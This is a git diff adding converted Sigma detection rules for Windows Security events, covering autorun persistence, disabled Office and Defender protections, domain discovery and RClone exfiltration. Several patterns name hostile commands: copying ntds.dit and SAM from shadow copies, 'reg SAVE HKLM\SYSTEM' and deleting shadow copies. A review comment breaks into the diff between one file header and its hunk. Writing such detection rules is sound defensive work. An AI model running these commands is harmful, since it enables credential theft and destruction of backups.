+ ie:
+ ObjectName|contains: \Software\Microsoft\Internet Explorer
+ wow_ie_details:
+ ObjectName|contains:
+ - \Toolbar
+ - \Extensions
+ - \Explorer Bars
+ wow_classes_base:
+ ObjectName|contains: \Software\Wow6432Node\Classes
+ wow_classes:
+ ObjectName|contains:
+ - \Folder\ShellEx\ExtShellFolderViews
+ - \Folder\ShellEx\DragDropHandlers
+ - \Folder\ShellEx\ColumnHandlers
+ - \Directory\Shellex\DragDropHandlers
+ - \Directory\Shellex\CopyHookHandlers
+ - \CLSID\{AC757296-3522-4E11-9862-C17BE5A1767E}\Instance
+ - \CLSID\{ABE3B9A4-257D-4B97-BD1A-294AF496222E}\Instance
+ - \CLSID\{7ED96837-96F0-4812-B211-F13C24117ED3}\Instance
+ - \CLSID\{083863F1-70DE-11d0-BD40-00A0C911CE86}\Instance
+ - \AllFileSystemObjects\ShellEx\DragDropHandlers
+ - \ShellEx\PropertySheetHandlers
+ - \ShellEx\ContextMenuHandlers
+ classes_base:
+ ObjectName|contains: \Software\Classes
+ classes:
+ ObjectName|contains:
+ - \Folder\ShellEx\ExtShellFolderViews
+ - \Folder\ShellEx\DragDropHandlers
+ - \Folder\Shellex\ColumnHandlers
+ - \Filter
+ - \Exefile\Shell\Open\Command\(Default)
+ - \Directory\Shellex\DragDropHandlers
+ - \Directory\Shellex\CopyHookHandlers
+ - \CLSID\{AC757296-3522-4E11-9862-C17BE5A1767E}\Instance
+ - \CLSID\{ABE3B9A4-257D-4B97-BD1A-294AF496222E}\Instance
+ - \CLSID\{7ED96837-96F0-4812-B211-F13C24117ED3}\Instance
+ - \CLSID\{083863F1-70DE-11d0-BD40-00A0C911CE86}\Instance
+ - \Classes\AllFileSystemObjects\ShellEx\DragDropHandlers
+ - \.exe
+ - \.cmd
+ - \ShellEx\PropertySheetHandlers
+ - \ShellEx\ContextMenuHandlers
+ scripts_base:
+ ObjectName|contains: \Software\Policies\Microsoft\Windows\System\Scripts
+ scripts:
+ ObjectName|contains:
+ - \Startup
+ - \Shutdown
+ - \Logon
+ - \Logoff
+ winsock_parameters_base:
+ ObjectName|contains: \System\CurrentControlSet\Services\WinSock2\Parameters
+ winsock_parameters:
+ ObjectName|contains:
+ - \Protocol_Catalog9\Catalog_Entries
+ - \NameSpace_Catalog5\Catalog_Entries
+ system_control_base:
+ ObjectName|contains: \SYSTEM\CurrentControlSet\Control
+ system_control:
+ ObjectName|contains:
+ - \Terminal Server\WinStations\RDP-Tcp\InitialProgram
+ - \Terminal Server\Wds\rdpwd\StartupPrograms
+ - \SecurityProviders\SecurityProviders
+ - \SafeBoot\AlternateShell
+ - \Print\Providers
+ - \Print\Monitors
+ - \NetworkProvider\Order
+ - \Lsa\Notification Packages
+ - \Lsa\Authentication Packages
+ - \BootVerificationProgram\ImagePath
+ filter:
+ - NewValue: (Empty)
+ - ObjectName|endswith: \NgcFirst\ConsecutiveSwitchCount
+ - ProcessName: C:\WINDOWS\System32\svchost.exe
+ condition: registry_event and (( main_selection or session_manager_base and session_manager or current_version_base and current_version or nt_current_version_base and nt_current_version or wow_current_version_base and wow_current_version or wow_nt_current_version_base and wow_nt_current_version or (wow_office or office) and wow_office_details or (wow_ie or ie) and wow_ie_details or wow_classes_base and wow_classes or classes_base and classes or scripts_base and scripts or winsock_parameters_base and winsock_parameters or system_control_base and system_control ) and not filter)
+fields:
+ - SecurityID
+ - ObjectName
+ - OldValueType
+ - NewValueType
+falsepositives:
+ - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason
+ - Legitimate administrator sets up autorun keys for legitimate reason
+tags:
+ - attack.persistence
+ - attack.t1547.001
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/deprecated/registry_set_abusing_windows_telemetry_for_persistence.yml b/tools/sigmac/converted_rules/builtin/deprecated/registry_set_abusing_windows_telemetry_for_persistence.yml
new file mode 100644
index 000000000..67a5cd103
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/deprecated/registry_set_abusing_windows_telemetry_for_persistence.yml
@@ -0,0 +1,50 @@
+title: Abusing Windows Telemetry For Persistence - Registry
+id: 4e8d5fd3-c959-441f-a941-f73d0cdcdca5
+status: deprecated
+description: |
+ Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections.
+ This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run.
+ The problem is, it will run any arbitrary command without restriction of location or type.
+references:
+ - https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/
+author: Sreeman
+date: 2020/09/29
+modified: 2023/08/17
+tags:
+ - attack.defense_evasion
+ - attack.persistence
+ - attack.t1112
+ - attack.t1053
+logsource:
+ product: windows
+ category: registry_set
+detection:
+ registry_set:
+ EventID: 4657
+ Channel: Security
+ selection:
+ ObjectName|contains: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\TelemetryController\
+ NewValue|endswith:
+ - .sh
+ - .exe
+ - .dll
+ - .bin
+ - .bat
+ - .cmd
+ - .js
+ - .ps
+ - .vb
+ - .jar
+ - .hta
+ - .msi
+ - .vbs
+ condition: registry_set and selection
+fields:
+ - ObjectName
+ - NewValue
+ - EventID
+ - CommandLine
+falsepositives:
+ - Unknown
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/deprecated/registry_set_add_hidden_user.yml b/tools/sigmac/converted_rules/builtin/deprecated/registry_set_add_hidden_user.yml
new file mode 100644
index 000000000..1d17dbb89
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/deprecated/registry_set_add_hidden_user.yml
@@ -0,0 +1,28 @@
+title: User Account Hidden By Registry
+id: 8a58209c-7ae6-4027-afb0-307a78e4589a
+status: deprecated
+description: Detect modification for a specific user to prevent that user from being listed on the logon screen
+references:
+ - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1564.002/T1564.002.md
+author: frack113
+date: 2022/08/20
+modified: 2023/08/17
+tags:
+ - attack.defense_evasion
+ - attack.t1564.002
+logsource:
+ product: windows
+ category: registry_set
+detection:
+ registry_set:
+ EventID: 4657
+ Channel: Security
+ selection:
+ ObjectName|contains: \SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist\
+ ObjectName|endswith: $
+ NewValue: DWORD (0x00000000)
+ condition: registry_set and selection
+falsepositives:
+ - Unknown
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/deprecated/registry_set_disable_microsoft_office_security_features.yml b/tools/sigmac/converted_rules/builtin/deprecated/registry_set_disable_microsoft_office_security_features.yml
new file mode 100644
index 000000000..5092d1a09
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/deprecated/registry_set_disable_microsoft_office_security_features.yml
@@ -0,0 +1,40 @@
+title: Disable Microsoft Office Security Features
+id: 7c637634-c95d-4bbf-b26c-a82510874b34
+status: deprecated
+description: Disable Microsoft Office Security Features by registry
+references:
+ - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md
+ - https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/
+ - https://yoroi.company/research/cyber-criminal-espionage-operation-insists-on-italian-manufacturing/
+author: frack113
+date: 2021/06/08
+modified: 2023/08/17
+tags:
+ - attack.defense_evasion
+ - attack.t1562.001
+logsource:
+ product: windows
+ category: registry_set
+ definition: key must be add to the sysmon configuration to works
+ # Sysmon
+ # \VBAWarnings
+ # \DisableInternetFilesInPV
+ # \DisableUnsafeLocationsInPV
+ # \DisableAttachementsInPV
+detection:
+ registry_set:
+ EventID: 4657
+ Channel: Security
+ selection:
+ ObjectName|contains: \SOFTWARE\Microsoft\Office\
+ ObjectName|endswith:
+ - VBAWarnings
+ - DisableInternetFilesInPV
+ - DisableUnsafeLocationsInPV
+ - DisableAttachementsInPV
+ NewValue: DWORD (0x00000001)
+ condition: registry_set and selection
+falsepositives:
+ - Unknown
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/deprecated/registry_set_office_security.yml b/tools/sigmac/converted_rules/builtin/deprecated/registry_set_office_security.yml
new file mode 100644
index 000000000..10c849c8c
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/deprecated/registry_set_office_security.yml
@@ -0,0 +1,31 @@
+title: Office Security Settings Changed
+id: a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd
+status: deprecated
+description: Detects registry changes to Office macro settings. The TrustRecords contain information on executed macro-enabled documents. (see references)
+references:
+ - https://twitter.com/inversecos/status/1494174785621819397
+ - https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/
+ - https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/
+author: Trent Liffick (@tliffick)
+date: 2020/05/22
+modified: 2023/08/17
+tags:
+ - attack.defense_evasion
+ - attack.t1112
+logsource:
+ category: registry_set
+ product: windows
+detection:
+ registry_set:
+ EventID: 4657
+ Channel: Security
+ selection:
+ ObjectName|endswith:
+ - \Security\Trusted Documents\TrustRecords
+ - \Security\AccessVBOM
+ - \Security\VBAWarnings
+ condition: registry_set and selection
+falsepositives:
+ - Valid Macros and/or internal documents
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/deprecated/registry_set_silentprocessexit.yml b/tools/sigmac/converted_rules/builtin/deprecated/registry_set_silentprocessexit.yml
new file mode 100644
index 000000000..3bd64f404
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/deprecated/registry_set_silentprocessexit.yml
@@ -0,0 +1,28 @@
+title: SilentProcessExit Monitor Registration
+id: c81fe886-cac0-4913-a511-2822d72ff505
+status: deprecated
+description: Detects changes to the Registry in which a monitor program gets registered to monitor the exit of another process
+references:
+ - https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/
+ - https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/
+author: Florian Roth (Nextron Systems)
+date: 2021/02/26
+modified: 2023/08/17
+tags:
+ - attack.persistence
+ - attack.t1546.012
+logsource:
+ category: registry_set
+ product: windows
+detection:
+ registry_set:
+ EventID: 4657
+ Channel: Security
+ selection:
+ ObjectName|contains: Microsoft\Windows NT\CurrentVersion\SilentProcessExit
+ NewValue|contains: MonitorProcess
+ condition: registry_set and selection
+falsepositives:
+ - Unknown
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/deprecated/sysmon_rclone_execution.yml b/tools/sigmac/converted_rules/builtin/deprecated/sysmon_rclone_execution.yml
new file mode 100644
index 000000000..154a30bb2
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/deprecated/sysmon_rclone_execution.yml
@@ -0,0 +1,50 @@
+title: RClone Execution
+id: a0d63692-a531-4912-ad39-4393325b2a9c
+status: deprecated
+description: Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc
+tags:
+ - attack.exfiltration
+ - attack.t1567.002
+author: Bhabesh Raj, Sittikorn S
+date: 2021/05/10
+modified: 2022/04/11
+references:
+ - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware
+ - https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a
+ - https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone
+ - https://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html
+fields:
+ - CommandLine
+ - ParentCommandLine
+ - Details
+falsepositives:
+ - Legitimate RClone use
+level: high
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection:
+ Description: Rsync for cloud storage
+ selection2:
+ CommandLine|contains|all:
+ - '--config '
+ - '--no-check-certificate '
+ - ' copy '
+ selection3:
+ CommandLine|contains:
+ - mega
+ - pcloud
+ - ftp
+ - --progress
+ - --ignore-existing
+ - --auto-confirm
+ - --transfers
+ - --multi-thread-streams
+ NewProcessName|endswith:
+ - \rclone.exe
+ condition: process_creation and (1 of selection*)
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/deprecated/win_defender_disabled.yml b/tools/sigmac/converted_rules/builtin/deprecated/win_defender_disabled.yml
new file mode 100644
index 000000000..475ab593b
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/deprecated/win_defender_disabled.yml
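Review bot: `selection` matches on `Description: Rsync for cloud storage`, but as far as I know the Security 4688 process-creation event carries no Description field (that is a Sysmon Event ID 1 field), so in this builtin conversion that branch of `1 of selection*` can never fire and the rule effectively reduces to `selection2` and `selection3`. Since the file is generated by the converter, the fix belongs there: either drop the unusable selection when the target is 4688, or record the gap under `logsource`, e.g. `definition: 'Note: Security 4688 has no Description field; only the command-line selections apply in this conversion.'`. The broad substrings in `selection3` (`ftp`, `mega`) are ANDed with `NewProcessName|endswith: \rclone.exe`, so that branch is fine as written.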
@@ -0,0 +1,31 @@
+title: Windows Defender Threat Detection Disabled
+id: fe34868f-6e0e-4882-81f6-c43aa8f15b62
+status: deprecated
+description: Detects disabling Windows Defender threat protection
+references:
+ - https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus
+ - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md
+author: Ján Trenčanský, frack113
+date: 2020/07/28
+modified: 2023/11/22
+tags:
+ - attack.defense_evasion
+ - attack.t1562.001
+logsource:
+ product: windows
+ service: windefend
+detection:
+ windefend:
+ Channel: Microsoft-Windows-Windows Defender/Operational
+ selection:
+ EventID:
+ - 5001 # Real-time protection is disabled.
+ - 5010 # Scanning for malware and other potentially unwanted software is disabled.
+ - 5012 # Scanning for viruses is disabled.
+ - 5101 # The antimalware platform is expired.
+ condition: windefend and selection
+falsepositives:
+ - Administrator actions (should be investigated)
+ - Seen being triggered occasionally during Windows 8 Defender Updates
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/deprecated/win_dsquery_domain_trust_discovery.yml b/tools/sigmac/converted_rules/builtin/deprecated/win_dsquery_domain_trust_discovery.yml
new file mode 100644
index 000000000..7d51fcd47
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/deprecated/win_dsquery_domain_trust_discovery.yml
@@ -0,0 +1,31 @@
+title: Domain Trust Discovery
+id: 77815820-246c-47b8-9741-e0def3f57308
+status: deprecated
+description: Detects a discovery of domain trusts.
+references:
+ - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md
+author: Jakob Weinzettl, oscd.community
+date: 2019/10/23
+modified: 2023/02/04
+tags:
+ - attack.discovery
+ - attack.t1482
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection:
+ - CommandLine|contains|all:
+ - -filter
+ - trustedDomain
+ NewProcessName|endswith: \dsquery.exe
+ - CommandLine|contains: domain_trusts
+ NewProcessName|endswith: \nltest.exe
+ condition: process_creation and selection
+falsepositives:
+ - Administration of systems.
+level: medium
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/deprecated/win_lateral_movement_condrv.yml b/tools/sigmac/converted_rules/builtin/deprecated/win_lateral_movement_condrv.yml
new file mode 100644
index 000000000..3ac136c3b
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/deprecated/win_lateral_movement_condrv.yml
@@ -0,0 +1,31 @@
+title: Lateral Movement Indicator ConDrv
+id: 29d31aee-30f4-4006-85a9-a4a02d65306c
+status: deprecated #Too many FP
+description: This event was observed on the target host during lateral movement. The process name within the event contains the process spawned post compromise. Account Name within the event contains the compromised user account name. This event should to be correlated with 4624 and 4688 for further intrusion context.
+author: Janantha Marasinghe
+date: 2021/04/27
+modified: 2022/05/14
+references:
+ - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/wmiexec-vbs.htm
+ - https://www.fireeye.com/blog/threat-research/2017/08/monitoring-windows-console-activity-part-one.html
+tags:
+ - attack.lateral_movement
+ - attack.execution
+ - attack.t1021
+ - attack.t1059
+logsource:
+ product: windows
+ service: security
+detection:
+ security:
+ Channel: Security
+ selection:
+ EventID: 4674
+ ObjectServer: Security
+ ObjectType: File
+ ObjectName: \Device\ConDrv
+ condition: security and selection
+falsepositives:
+ - Legal admin action
+level: low
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/deprecated/win_security_event_log_cleared.yml b/tools/sigmac/converted_rules/builtin/deprecated/win_security_event_log_cleared.yml
new file mode 100644
index 000000000..dbe8628c2
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/deprecated/win_security_event_log_cleared.yml
@@ -0,0 +1,30 @@
+title: Security Event Log Cleared
+id: a122ac13-daf8-4175-83a2-72c387be339d
+status: deprecated
+description: Checks for event id 1102 which indicates the security event log was cleared.
+references:
+ - https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/SecurityEventLogCleared.yaml
+author: Saw Winn Naung
+date: 2021/08/15
+modified: 2023/12/06
+tags:
+ - attack.t1070.001
+logsource:
+ service: security
+ product: windows
+detection:
+ security:
+ Channel: Security
+ selection:
+ EventID: 1102
+ Provider_Name: Microsoft-Windows-Eventlog
+ condition: security and selection
+falsepositives:
+ - Legitimate administrative activity
+fields:
+ - SubjectLogonId
+ - SubjectUserName
+ - SubjectUserSid
+ - SubjectDomainName
+level: medium
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/deprecated/win_security_group_modification_logging.yml b/tools/sigmac/converted_rules/builtin/deprecated/win_security_group_modification_logging.yml
new file mode 100644
index 000000000..8e3be50b5
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/deprecated/win_security_group_modification_logging.yml
@@ -0,0 +1,69 @@
+title: Group Modification Logging
+id: 9cf01b6c-e723-4841-a868-6d7f8245ca6e
+status: deprecated
+description: |
+ Configure systems to issue a log entry and alert when an account is added to or removed from any group assigned administrative privileges.
+ Sigma detects
+ Event ID 4728 indicates a "Member is added to a Security Group".
+ Event ID 4729 indicates a "Member is removed from a Security enabled-group".
+ Event ID 4730 indicates a "Security Group is deleted".
+ The case is not applicable for Unix OS.
+ Supported OS - Windows 2008 R2 and 7, Windows 2012 R2 and 8.1, Windows 2016 and 10 Windows Server 2019, Windows Server 2000, Windows 2003 and XP.
+references:
+ - https://www.cisecurity.org/controls/cis-controls-list/
+ - https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf
+ - https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf
+ - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4728
+ - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4729
+ - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4730
+ - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=633
+ - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=632
+ - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=634
+author: Alexandr Yampolskyi, SOC Prime
+date: 2019/03/26
+modified: 2023/04/26
+# tags:
+ # - CSC4
+ # - CSC4.8
+ # - NIST CSF 1.1 PR.AC-4
+ # - NIST CSF 1.1 PR.AT-2
+ # - NIST CSF 1.1 PR.MA-2
+ # - NIST CSF 1.1 PR.PT-3
+ # - ISO 27002-2013 A.9.1.1
+ # - ISO 27002-2013 A.9.2.2
+ # - ISO 27002-2013 A.9.2.3
+ # - ISO 27002-2013 A.9.2.4
+ # - ISO 27002-2013 A.9.2.5
+ # - ISO 27002-2013 A.9.2.6
+ # - ISO 27002-2013 A.9.3.1
+ # - ISO 27002-2013 A.9.4.1
+ # - ISO 27002-2013 A.9.4.2
+ # - ISO 27002-2013 A.9.4.3
+ # - ISO 27002-2013 A.9.4.4
+ # - PCI DSS 
3.2 2.1
+ # - PCI DSS 3.2 7.1
+ # - PCI DSS 3.2 7.2
+ # - PCI DSS 3.2 7.3
+ # - PCI DSS 3.2 8.1
+ # - PCI DSS 3.2 8.2
+ # - PCI DSS 3.2 8.3
+ # - PCI DSS 3.2 8.7
+logsource:
+ product: windows
+ service: security
+detection:
+ security:
+ Channel: Security
+ selection:
+ EventID:
+ - 4728 # A member was added to a security-enabled global group
+ - 4729 # A member was removed from a security-enabled global group
+ - 4730 # A security-enabled global group was deleted
+ - 633 # Security Enabled Global Group Member Removed
+ - 632 # Security Enabled Global Group Member Added
+ - 634 # Security Enabled Global Group Deleted
+ condition: security and selection
+falsepositives:
+ - Unknown
+level: low
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/deprecated/win_security_lolbas_execution_of_nltest.yml b/tools/sigmac/converted_rules/builtin/deprecated/win_security_lolbas_execution_of_nltest.yml
new file mode 100644
index 000000000..bfd8d86ac
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/deprecated/win_security_lolbas_execution_of_nltest.yml
@@ -0,0 +1,34 @@
+title: Correct Execution of Nltest.exe
+id: eeb66bbb-3dde-4582-815a-584aee9fe6d1
+status: deprecated
+description: The attacker might use LOLBAS nltest.exe for discovery of domain controllers, domain trusts, parent domain and the current user permissions.
+references:
+ - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/nltest.htm
+ - https://attack.mitre.org/software/S0359/
+author: Arun Chauhan
+date: 2021/10/04
+modified: 2023/02/02
+tags:
+ - attack.discovery
+ - attack.t1482 # enumerate trusted domains by using commands such as nltest /domain_trusts
+ - attack.t1018 # enumerate remote domain controllers using options such as /dclist and /dsgetdc
+ - attack.t1016 # enumerate the parent domain of a local machine using /parentdomain
+logsource:
+ product: windows
+ service: security
+detection:
+ security:
+ Channel: Security
+ selection:
+ EventID: 4689
+ ProcessName|endswith: nltest.exe
+ Status: '0x0'
+ condition: security and selection
+fields:
+ - SubjectUserName
+ - SubjectDomainName
+falsepositives:
+ - Red team activity
+ - Rare legitimate use by an administrator
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/deprecated/win_susp_esentutl_activity.yml b/tools/sigmac/converted_rules/builtin/deprecated/win_susp_esentutl_activity.yml
new file mode 100644
index 000000000..7008e5553
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/deprecated/win_susp_esentutl_activity.yml
@@ -0,0 +1,34 @@
+title: Suspicious Esentutl Use
+id: 56a8189f-11b2-48c8-8ca7-c54b03c2fbf7
+status: deprecated
+description: Detects flags often used with the LOLBAS Esentutl for malicious activity. It could be used in rare cases by administrators to access locked files or during maintenance.
+author: Florian Roth (Nextron Systems)
+date: 2020/05/23
+modified: 2022/04/11
+references:
+ - https://lolbas-project.github.io/
+ - https://twitter.com/chadtilbury/status/1264226341408452610
+tags:
+ - attack.defense_evasion
+ - attack.execution
+ - attack.s0404
+ - attack.t1218
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection:
+ CommandLine|contains|all:
+ - ' /vss '
+ - ' /y '
+ condition: process_creation and selection
+fields:
+ - CommandLine
+ - ParentCommandLine
+falsepositives:
+ - Administrative activity
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/deprecated/win_susp_vssadmin_ntds_activity.yml b/tools/sigmac/converted_rules/builtin/deprecated/win_susp_vssadmin_ntds_activity.yml
new file mode 100644
index 000000000..554165915
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/deprecated/win_susp_vssadmin_ntds_activity.yml
@@ -0,0 +1,42 @@
+title: Activity Related to NTDS.dit Domain Hash Retrieval
+id: b932b60f-fdda-4d53-8eda-a170c1d97bbd
+status: deprecated
+description: Detects suspicious commands that could be related to activity that uses volume shadow copy to steal and retrieve hashes from the NTDS.dit file remotely
+author: Florian Roth (Nextron Systems), Michael Haag
+date: 2019/01/16
+modified: 2022/04/11
+references:
+ - https://www.swordshield.com/2015/07/getting-hashes-from-ntds-dit-file/
+ - https://room362.com/post/2013/2013-06-10-volume-shadow-copy-ntdsdit-domain-hashes-remotely-part-1/
+ - https://www.trustwave.com/Resources/SpiderLabs-Blog/Tutorial-for-NTDS-goodness-(VSSADMIN,-WMIS,-NTDS-dit,-SYSTEM)/
+ - https://securingtomorrow.mcafee.com/mcafee-labs/new-teslacrypt-ransomware-arrives-via-spam/
+ - https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/
+tags:
+ - attack.credential_access
+ - attack.t1003
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection:
+ CommandLine:
+ - vssadmin.exe Delete Shadows
+ - 'vssadmin create shadow /for=C:'
+ - copy \\?\GLOBALROOT\Device\\*\windows\ntds\ntds.dit
+ - copy \\?\GLOBALROOT\Device\\*\config\SAM
+ - 'vssadmin delete shadows /for=C:'
+ - 'reg SAVE HKLM\SYSTEM '
+ - esentutl.exe /y /vss *\ntds.dit*
+ - esentutl.exe /y /vss *\SAM
+ - esentutl.exe /y /vss *\SYSTEM
+ condition: process_creation and selection
+fields:
+ - CommandLine
+ - ParentCommandLine
+falsepositives:
+ - Administrative activity
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/deprecated/win_system_service_install_susp_double_ampersand.yml b/tools/sigmac/converted_rules/builtin/deprecated/win_system_service_install_susp_double_ampersand.yml
new file mode 100644
index 000000000..343dee973
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/deprecated/win_system_service_install_susp_double_ampersand.yml
@@ -0,0 +1,27 @@
+title: New Service Uses Double Ampersand in Path
+id: ca83e9f3-657a-45d0-88d6-c1ac280caf53
+status: deprecated
+description: Detects a service installation that uses a suspicious double ampersand used in the image path value
+references:
+ - Internal Research
+author: Florian Roth (Nextron Systems)
+date: 2022/07/05
+modified: 2023/11/15
+tags:
+ - attack.defense_evasion
+ - attack.t1027
+logsource:
+ product: windows
+ service: system
+detection:
+ system:
+ Channel: System
+ selection:
+ Provider_Name: Service Control Manager
+ EventID: 7045
+ ImagePath|contains: '&&'
+ condition: system and selection
+falsepositives:
+ - Unknown
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/diagnosis/scripted/win_diagnosis_scripted_load_remote_diagcab.yml b/tools/sigmac/converted_rules/builtin/diagnosis/scripted/win_diagnosis_scripted_load_remote_diagcab.yml
new file mode 100644
index 000000000..d12cf61cc
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/diagnosis/scripted/win_diagnosis_scripted_load_remote_diagcab.yml
@@ -0,0 +1,25 @@
+title: Loading Diagcab Package From Remote Path
+id: 50cb47b8-2c33-4b23-a2e9-4600657d9746
+status: test
+description: Detects loading of diagcab packages from a remote path, as seen in DogWalk vulnerability
+references:
+ - https://twitter.com/nas_bench/status/1539679555908141061
+ - https://twitter.com/j00sean/status/1537750439701225472
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2022/08/14
+tags:
+ - attack.execution
+logsource:
+ product: windows
+ service: diagnosis-scripted
+detection:
+ diagnosis_scripted:
+ Channel: Microsoft-Windows-Diagnosis-Scripted/Operational
+ selection:
+ EventID: 101
+ PackagePath|contains: \\\\ # Example would be: \\webdav-test.herokuapp.com@ssl\DavWWWRoot\package
+ condition: diagnosis_scripted and selection
+falsepositives:
+ - Legitimate package hosted on a known and authorized remote location
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/dns_client/win_dns_client__mal_cobaltstrike.yml b/tools/sigmac/converted_rules/builtin/dns_client/win_dns_client__mal_cobaltstrike.yml
new file mode 100644
index 000000000..90aac3c83
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/dns_client/win_dns_client__mal_cobaltstrike.yml
@@ -0,0 +1,35 @@
+title: Suspicious Cobalt Strike DNS Beaconing - DNS Client
+id: 0d18728b-f5bf-4381-9dcf-915539fff6c2
+related:
+ - id: f356a9c4-effd-4608-bbf8-408afd5cd006
+ type: similar
+status: test
+description: Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons
+references:
+ - https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns
+ - https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2023/01/16
+tags:
+ - attack.command_and_control
+ - attack.t1071.004
+logsource:
+ product: windows
+ service: dns-client
+ definition: 'Requirements: Microsoft-Windows-DNS Client Events/Operational Event Log must be enabled/collected in order to receive the events.'
+detection:
+ dns_client:
+ Channel: Microsoft-Windows-DNS Client Events/Operational
+ selection_eid:
+ EventID: 3008
+ selection_query_1:
+ QueryName|startswith:
+ - aaa.stage.
+ - post.1
+ selection_query_2:
+ QueryName|contains: .stage.123456.
+ condition: dns_client and (selection_eid and 1 of selection_query_*)
+falsepositives:
+ - Unknown
+level: critical
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/dns_client/win_dns_client_anonymfiles_com.yml b/tools/sigmac/converted_rules/builtin/dns_client/win_dns_client_anonymfiles_com.yml
new file mode 100644
index 000000000..abddacb4d
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/dns_client/win_dns_client_anonymfiles_com.yml
@@ -0,0 +1,29 @@
+title: DNS Query for Anonfiles.com Domain - DNS Client
+id: 29f171d7-aa47-42c7-9c7b-3c87938164d9
+related:
+ - id: 065cceea-77ec-4030-9052-fc0affea7110
+ type: similar
+status: test
